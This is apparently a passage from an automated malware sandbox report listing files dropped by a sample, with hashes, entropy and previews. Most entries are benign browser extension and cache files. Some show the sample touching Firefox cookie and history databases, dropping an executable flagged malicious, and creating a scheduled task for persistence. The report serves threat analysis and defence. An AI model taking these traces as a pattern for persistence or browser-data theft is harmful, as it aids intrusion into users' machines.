XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417833205646285
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
MD5:	236D2DD305D64C2B6ABD232ED53270DF
SHA1:	9F6885E95FBC4213631F0B0EA49C803D07D34136
SHA-256:	2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
SHA-512:	B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3777)
Category:	dropped
Size (bytes):	98880
Entropy (8bit):	5.414989230634404
Encrypted:	false
SSDEEP:	1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
MD5:	DC93A1045D1AD8D7ADD06B93B2FE79E2
SHA1:	CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
SHA-256:	D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
SHA-512:	025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3782)
Category:	dropped
Size (bytes):	107677
Entropy (8bit):	5.396220758526552
Encrypted:	false
SSDEEP:	1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
MD5:	E8015AC436B33034EDF7DA060E853A04
SHA1:	62D0F6EB0E441158A1F56F6E0C70D3D229B57886
SHA-256:	23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
SHA-512:	C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\dbb5af53-bfde-403d-8b65-703e23a7026a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	138356
Entropy (8bit):	7.809609231921042
Encrypted:	false
SSDEEP:	3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
MD5:	3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
SHA1:	9B73F46ADFA1F4464929B408407E73D4535C6827
SHA-256:	19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
SHA-512:	D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....\|..F....\|....V....w.%t.y..?..&..a..<.n....S+\|..=.ra.....

C:\Users\user\AppData\Local\Temp\scoped_dir7404_989055407\740caac0-0f01-40d8-99c6-8c0a787e5090.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir7404_989055407\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir7404_989055407\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7404_989055407\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7404_989055407\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\DocumentsDBKKKEHDHC.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1951744
Entropy (8bit):	7.950084187380955
Encrypted:	false
SSDEEP:	49152:ONNzdkFg30Kk74f4wiVZLfGRf7s9HtjOThexHJ5C0o:2gFuW0wwiLfG1sbjOSJ5C0o
MD5:	60345799039B0C985D836024C003B152
SHA1:	54715118A518158F52DE07BAA3282B605350D7BA
SHA-256:	338A8F4956CDD830B17B6B501E525C8337AB7916459684643116FCECA31D4A9A
SHA-512:	B8F2F62C5561E96CB9929E060893FC6D2D9FDA3E5E508A211B046501B360015A85C59490F6BB1C89ED2B48BA55D46028373ED50769BB16E269C7744AA9A9202B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................0M...........@..........................`M......7....@.................................W...k.......D.....................M.............................d.M..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..+.........................@...zmgocjct.....p2.....................@...whbetzff..... M.....................@....taggant.0...0M.."..................@...................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsDBKKKEHDHC.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.47521512957776
Encrypted:	false
SSDEEP:	6:uoWtXUhXUEZ+lX1CGdKUe6tE9+AQy0lB0st0:lWZ4Q1CGAFD9+nVB0st0
MD5:	D4D4595B31D8D11E360796E214A14022
SHA1:	626143A75DAD4B908CA28E360422041623D60037
SHA-256:	457B3DCE00A450EB019C42DCC2DDD3A9A67FD55D88C5BB3675BC3CA47B6B5B5D
SHA-512:	251987D4D31697D50186FE7EA51C48B458D6F1F159115AD2DF913B5D39D4754FF13DEDB36DC9774A6E0561DF72F486100B55E7B586C9AD9E5C02A7D4AA04CD1D
Malicious:	false
Preview:	.....@....M........F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

Chrome Cache Entry: 531

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (795)
Category:	downloaded
Size (bytes):	800
Entropy (8bit):	5.1754533216218155
Encrypted:	false
SSDEEP:	24:k38qpIp/1EOeasXBHslgT9lCuABuoB7HHHHHHHYqmffffffo:e8qIpSOehKlgZ01BuSEqmffffffo
MD5:	AA4400618E8F50B6D6BEF894708D49AF
SHA1:	26792DCB40B2359E26843342C232C4F14A45F4D6
SHA-256:	A2DD9BDF5BAE3FB2B2B5D9F869C93BBB7B0DEEB76FD98E459A61C7D2D0A475C5
SHA-512:	3151675B7FAE4251297B7ABE5D85384DD8F75C6528969E1CFC8ED781E3EED7C59FF07D702A9203E2365B2EEB92DD99AD72D8AE3C1349156622F2819A250E6D8B
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["will there be a arcane season 3","lexi rodriguez volleyball","v bucks redeem codes","spacex starlink launch falcon 9","billboard music awards","mississippi teacher dog treats","cade cunningham injury report","krispy kreme grinch doughnuts"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 532

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	175021
Entropy (8bit):	5.5519862292821776
Encrypted:	false
SSDEEP:	3072:kEBR0Kx4gWiUIzT2Zu2AuhZNsWGUHUylZBTftnn2N2DIWHUm1CBT46mG3bXnejYR:kKR0oWiUIzy42AuXNsWGUHLlZBTftn2b
MD5:	6ECBEC06F6245882E6D9659E66022263
SHA1:	F86FC301A3851511557DF798AD2BAD2AA4659946
SHA-256:	F7885470D82B8357E5AD03205AC0885DD9FD6F965E550D746627E5E35D4CF66B
SHA-512:	F2EDD978C9DC289B82DC0956503659B92C3B621DD1001DB2C5C34ACA01FFCDE7F84A6B24ED0B30A1EA6B15D937B6DD93FAE1DB97DCE26E9F9FCE1A3F5C43A8DD
Malicious:	false
